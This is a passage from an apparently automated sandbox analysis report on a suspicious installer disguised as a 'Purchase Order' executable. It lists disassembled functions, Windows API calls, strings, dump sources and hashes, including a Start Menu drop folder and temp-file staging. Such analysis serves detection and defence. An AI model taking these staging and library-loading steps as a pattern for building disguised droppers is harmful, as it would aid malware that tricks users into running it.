4032aa-4032ae 968->969 969->947 972 4032b4 969->972 972->929 973->956 974 403297-40329a 973->974 974->969
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CountTick$wsprintf
                                              • String ID: ... %d%%$@
                                              • API String ID: 551687249-3859443358
                                              • Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                              • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                              • Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                              • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9
                                              Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1021 406624-406644 GetSystemDirectoryW 1022 406646 1021->1022 1023 406648-40664a 1021->1023 1022->1023 1024 40665b-40665d 1023->1024 1025 40664c-406655 1023->1025 1027 40665e-406691 wsprintfW LoadLibraryExW 1024->1027 1025->1024 1026 406657-406659 1025->1026 1026->1027
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                              • wsprintfW.USER32 ref: 00406676
                                              • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040668A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                              • String ID: %s%S.dll$UXTHEME$\
                                              • API String ID: 2200240437-1946221925
                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                              • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                              • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                              Function 004057F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1028 4057f1-40583c CreateDirectoryW 1029 405842-40584f GetLastError 1028->1029 1030 40583e-405840 1028->1030 1031 405869-40586b 1029->1031 1032 405851-405865 SetFileSecurityW 1029->1032 1030->1031 1032->1030 1033 405867 GetLastError 1032->1033 1033->1031
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                              • GetLastError.KERNEL32 ref: 00405848
                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                              • GetLastError.KERNEL32 ref: 00405867
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 3449924974-1876063424
                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                              • Instruction ID: 56aaffc7fd545305371b439287a03fd7ccaf004a29b63406c0e33255b185a1b6
                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                              • Instruction Fuzzy Hash: 90011A72D00619EADF00DFA1C944BEFBBB8EF14354F00843AE945B6281D7789618CFA9
                                              Function 00405DDF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1034 405ddf-405deb 1035 405dec-405e20 GetTickCount GetTempFileNameW 1034->1035 1036 405e22-405e24 1035->1036 1037 405e2f-405e31 1035->1037 1036->1035 1038 405e26 1036->1038 1039 405e29-405e2c 1037->1039 1038->1039
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405DFD
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9), ref: 00405E18
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8
                                              • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 00405DDF
                                              • nsa, xrefs: 00405DEC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-3914367848
                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                              • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                              • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                              Function 7012177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1040 7012177b-701217ba call 70121b63 1044 701217c0-701217c4 1040->1044 1045 701218da-701218dc 1040->1045 1046 701217c6-701217cc call 70122356 1044->1046 1047 701217cd-701217da call 70122398 1044->1047 1046->1047 1052 7012180a-70121811 1047->1052 1053 701217dc-701217e1 1047->1053 1054 70121813-7012182f call 7012256d call 701215b4 call 70121272 GlobalFree 1052->1054 1055 70121831-70121835 1052->1055 1056 701217e3-701217e4 1053->1056 1057 701217fc-701217ff 1053->1057 1081 70121889-7012188d 1054->1081 1058 70121882-70121888 call 7012256d 1055->1058 1059 70121837-70121880 call 701215c6 call 7012256d 1055->1059 1062 701217e6-701217e7 1056->1062 1063 701217ec-701217ed call 70122a74 1056->1063 1057->1052 1060 70121801-70121802 call 70122d2f 1057->1060 1058->1081 1059->1081 1075 70121807 1060->1075 1064 701217f4-701217fa call 70122728 1062->1064 1065 701217e9-701217ea 1062->1065 1072 701217f2 1063->1072 1080 70121809 1064->1080 1065->1052 1065->1063 1072->1075 1075->1080 1080->1052 1084 701218ca-701218d1 1081->1084 1085 7012188f-7012189d call 70122530 1081->1085 1084->1045 1087 701218d3-701218d4 GlobalFree 1084->1087 1090 701218b5-701218bc 1085->1090 1091 7012189f-701218a2 1085->1091 1087->1045 1090->1084 1093 701218be-701218c9 call 7012153d 1090->1093 1091->1090 1092 701218a4-701218ac 1091->1092 1092->1090 1094 701218ae-701218af FreeLibrary 1092->1094 1093->1084 1094->1090
                                              APIs
                                                • Part of subcall function 70121B63: GlobalFree.KERNEL32(?), ref: 70121DB6
                                                • Part of subcall function 70121B63: GlobalFree.KERNEL32(?), ref: 70121DBB
                                                • Part of subcall function 70121B63: GlobalFree.KERNEL32(?), ref: 70121DC0
                                              • GlobalFree.KERNEL32(00000000), ref: 70121829
                                              • FreeLibrary.KERNEL32(?), ref: 701218AF
                                              • GlobalFree.KERNEL32(00000000), ref: 701218D4
                                                • Part of subcall function 70122356: GlobalAlloc.KERNEL32(?,?), ref: 70122387
                                                • Part of subcall function 70122728: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,701217FA,00000000), ref: 701227F8
                                                • Part of subcall function 701215C6: lstrcpyW.KERNEL32(?,70124020,00000000,701215C3,?,00000000,70121753,00000000), ref: 701215DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              • Associated: 00000000.00000002.2025997194.0000000070120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026073766.0000000070123000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2026100149.0000000070125000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                              • String ID:
                                              • API String ID: 1791698881-3916222277
                                              • Opcode ID: 7feaa86fb344cbed48f94f28c0eb3b43cbe7060bbdebc6bdf3de49a48f581310
                                              • Instruction ID: b01d95d6791a62340b85b91c8b69cbe5e7f7550a10a63955c547dba6131446af
                                              • Opcode Fuzzy Hash: 7feaa86fb344cbed48f94f28c0eb3b43cbe7060bbdebc6bdf3de49a48f581310
                                              • Instruction Fuzzy Hash: E941C072700204AECB05CF20FCC4B9E37ACBB25313F1245A9F9079A686DBB89585CB60
                                              Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1097 4023e4-402415 call 402c41 * 2 call 402cd1 1104 402ac5-402ad4 1097->1104 1105 40241b-402425 1097->1105 1107 402427-402434 call 402c41 lstrlenW 1105->1107 1108 402438-40243b 1105->1108 1107->1108 1111 40243d-40244e call 402c1f 1108->1111 1112 40244f-402452 1108->1112 1111->1112 1115 402463-402477 RegSetValueExW 1112->1115 1116 402454-40245e call 403116 1112->1116 1117 402479 1115->1117 1118 40247c-40255d RegCloseKey 1115->1118 1116->1115 1117->1118 1118->1104 1122 40288b-402892 1118->1122 1122->1104
                                              APIs
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh5948.tmp,00000023,00000011,00000002), ref: 0040242F
                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,00000000,00000011,00000002), ref: 0040246F
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh5948.tmp,00000000,00000011,00000002), ref: 00402557
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CloseValuelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsh5948.tmp
                                              • API String ID: 2655323295-2766044596
                                              • Opcode ID: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                              • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                              • Opcode Fuzzy Hash: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                              • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C48
                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040161A
                                                • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,00000000,?), ref: 0040164D
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes, xrefs: 00401640
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
                                              • API String ID: 1892508949-2837566543
                                              • Opcode ID: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                              • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                              • Opcode Fuzzy Hash: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                              • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E
                                              Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 004052C5
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                              • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                              • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                              • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                              Function 00406188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                              • RegCloseKey.KERNELBASE(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID: Call
                                              • API String ID: 3356406503-1824292864
                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                              • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                              • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                              Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                              • CloseHandle.KERNEL32(?), ref: 004058D9
                                              Strings
                                              • Error launching installer, xrefs: 004058B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                              • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                              • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                              • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                              Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040205D
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,755723A0), ref: 0040537D
                                                • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                              • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 0040206E
                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 004020EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1989260739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989289613.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989304530.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1989423102.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 334405425-0
                                              • Opcode ID: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
